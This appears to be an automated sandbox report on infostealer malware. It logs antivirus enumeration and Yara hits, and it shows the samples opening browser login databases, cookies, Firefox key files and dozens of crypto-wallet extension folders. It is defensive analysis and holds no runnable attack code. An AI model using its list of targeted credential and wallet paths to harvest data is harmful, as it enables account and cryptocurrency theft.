                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe Code function: 6_2_00B1CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00B1CBEA
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: AApUa7VQiy.exe, 00000000.00000003.1382937606.0000000001433000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2036330174.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108189234.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2035595673.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092673789.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2036330174.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2035830156.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108189234.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092673789.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077350251.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077350251.00000000011CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                            Stealing of Sensitive Information

                            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                            Source: Yara match File source: 7.2.skotes.exe.20000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 8.2.skotes.exe.20000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 6.2.BEB973FPO2R62ZWABVOVP8TC.exe.b00000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 9.2.skotes.exe.20000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000006.00000003.1506211610.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000006.00000002.1546879415.0000000000B01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara match File source: 00000008.00000003.1553837729.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000008.00000002.1594893003.0000000000021000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match File source: 00000009.00000002.2746685705.0000000000021000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match File source: 00000007.00000002.1587332477.0000000000021000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match File source: 00000009.00000003.1732352308.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: AApUa7VQiy.exe PID: 7488, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: ktIplF5.exe PID: 4272, type: MEMORYSTR
                            Source: Yara match File source: sslproxydump.pcap, type: PCAP
                            Source: Yara match File source: 0000000C.00000002.2766438930.0000000002B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 0000000C.00000002.2769111008.0000000002BD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: flv2aviconverter24.exe PID: 2400, type: MEMORYSTR
                            Source: Yara match File source: 00000003.00000002.1533551948.0000000000691000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara match File source: 00000003.00000003.1492478453.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: ES0PERDCSSGNQK1XTMK282189FFMR8.exe PID: 7892, type: MEMORYSTR
                            Source: Yara match File source: dump.pcap, type: PCAP
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
                            Source: AApUa7VQiy.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                            Source: AApUa7VQiy.exe, 00000000.00000003.1341672142.0000000005D7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
                            Source: AApUa7VQiy.exe, 00000000.00000003.1383159698.0000000001458000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
                            Source: AApUa7VQiy.exe String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.000000000142C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                            Source: ktIplF5.exe, 0000000F.00000003.1955909943.0000000001239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
